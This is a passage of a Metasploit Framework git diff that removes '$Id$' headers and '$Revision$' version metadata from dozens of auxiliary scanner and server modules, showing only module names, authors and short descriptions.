'$Revision$', 'Description' => %q{ This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 47c12693fa..14a4c1ef97 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SSH Public Key Login Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index e3fc88514f..4a5edaeed9 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SSH Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect SSH Version.', 'References' => [ diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 95aeca87d8..ebff3dbf6d 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -48,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Wardialer', - 'Version' => '$Revision$', 'Description' => 'Scan for dial-up systems that are connected to modems and answer telephony indials.', 'Author' => [ 'I)ruid' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index 44d0dd0f15..91d330692a 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lantronix Telnet Service Banner Detection', - 'Version' => '$Revision$', 'Description' => 'Detect Lantronix telnet services', 'Author' => ['theLightCosine', 'hdm'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 77741cee0d..1495624749 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telnet Service Encyption Key ID Overflow Detection', - 'Version' => '$Revision$', 'Description' => 'Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)', 'Author' => [ 'Jaime Penalba Estebanez ', 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index e76bd1a163..0d513e9654 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telnet Login Check Scanner', - #'Version' => '$Revision$', + # 'Description' => %q{ This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 2682c02699..b24fdb8e4e 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telnet Service Banner Detection', - 'Version' => '$Revision$', 'Description' => 'Detect telnet services', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 99cfba7582..489859d8f6 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'TFTP Brute Forcer', 'Description' => 'This module uses a dictionary to brute force valid TFTP image names from a TFTP server.', 'Author' => 'antoine', - 'Version' => '$Revision$', 'License' => BSD_LICENSE ) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 2d7d761d5f..4f182bf6b3 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover information from UPnP-enabled systems', 'Author' => 'todb', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index fd758794d5..2d7c8c8d67 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare ESX/ESXi Fingerprint Scanner', - 'Version' => '$Revision$', 'Description' => %Q{ This module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server. diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index 0a2cc08984..9a262b9478 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Authentication Daemon Login Scanner', - 'Version' => '$Revision$', 'Description' => %q{This module will test vmauthd logins on a range of machines and report successful logins. }, diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 7db383ae18..0c842b578f 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Authentication Daemon Version Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will identify information about a host through the vmauthd service. diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index 569dcc560f..8815bce4c4 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate Permissions', - 'Version' => '$Revision$', 'Description' => %Q{ This module will log into the Web API of VMWare and try to enumerate all the user/group permissions. Unlike enum suers this is only diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 025d137770..8e1021578d 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate Active Sessions', - 'Version' => '$Revision$', 'Description' => %Q{ This module will log into the Web API of VMWare and try to enumerate all the login sessions. diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 54f626c2ac..700fb3f96a 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate User Accounts', - 'Version' => '$Revision$', 'Description' => %Q{ This module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 948821801c..175571e14c 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index 164965300b..5bf6a1fbcc 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate Host Details', - 'Version' => '$Revision$', 'Description' => %Q{ This module attempts to enumerate information about the host systems through the VMWare web API. This can include information about the hardware installed on the host machine. diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index e2beb0247f..ab2bbe2892 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Web Login Scanner', - 'Version' => '$Revision$', 'Description' => 'This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI', 'Author' => ['theLightCosine'], diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index ae403685ce..face2be067 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Screenshot Stealer', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses supplied login credentials to connect to VMWare via the web interface. It then searches through the datastores looking for screenshots. diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 3a3b2c0889..3a710d2e90 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VNC Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index 3de1c52f95..acbc46b9d2 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VNC Authentication None Detection', - 'Version' => '$Revision$', 'Description' => 'Detect VNC servers that support the "None" authentication method.', 'References' => [ diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 084be064b5..c3472d1640 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telephone Line Voice Scanner', - 'Version' => '$Revision$', 'Description' => 'This module dials a range of phone numbers and records audio from each answered call', 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 7f57f34724..c9b67caf0d 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VxWorks WDB Agent Boot Parameter Scanner', - 'Version' => '$Revision$', 'Description' => 'Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index d8d9dbc8c9..7427a46f28 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VxWorks WDB Agent Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Scan for exposed VxWorks wdbrpc daemons', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index d0b583a549..7075db1147 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'WinRM Authentication Method Detection', - 'Version' => '$Revision$', 'Description' => %q{ This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported. diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index a4a4dcc6b1..12f0c70422 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 5c516f9282..d8012fb723 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'WinRM Login Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index c93865bb3d..ed09cfd583 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'WinRM WQL Query Runner', - 'Version' => '$Revision$', 'Description' => %q{ This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index a271b64563..0de53e014a 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'X11 No-Auth Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module scans for X11 servers that allow anyone to connect without authentication. diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index c448b42865..cd8e1a0274 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client Automatic Exploiter', - 'Version' => '$Revision$', 'Description' => %q{ This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index b71f9f1ce8..2072b8545b 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake DRDA (DB2, Informix, Derby) server that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 822108e56c..e0fcce9aed 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: FTP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake FTP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index c514d5e873..90c48a9c56 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: HTTP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake HTTP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 37600f2a6f..0cf8e81bed 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client MS Credential Catcher', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to quietly catch NTLM/LM Challenge hashes. }, @@ -35,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary [ 'Ryan Linn ', ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 7111cbc4a7..8b0df65051 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: IMAP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake IMAP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index dba3449c76..83a21919ff 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: MySQL', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake MySQL service that is designed to capture authentication credentials. It captures challenge and diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index d7ebca54e0..a967fe082d 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: POP3', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake POP3 service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index eb64780bfa..198b38de7e 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Printjob Capture Service', - 'Version' => '$Revision$', 'Description' => %q{ This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 0ddd78c71f..4ca4a8f310 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: SIP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake SIP service that is designed to capture authentication credentials. It captures challenge and diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 577b87e541..24f67d9121 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: SMB', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index bb708d6b18..500feec68b 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: SMTP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake SMTP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index 143735d23e..317feea516 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: Telnet', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 8d1f7229b9..b08a04aacf 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DHCP Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a DHCP service }, diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 4e18eb4a6b..cf5275988a 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DNS Spoofing Helper Service', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a DNS service that returns TXT records indicating information about the querying service. diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 2f97f897eb..60bd62c9e8 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Fake DNS Service', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a DNS service that redirects all queries to a particular address. diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index 3e459175cb..31ae8e3dfc 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP File Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a FTP service }, diff --git 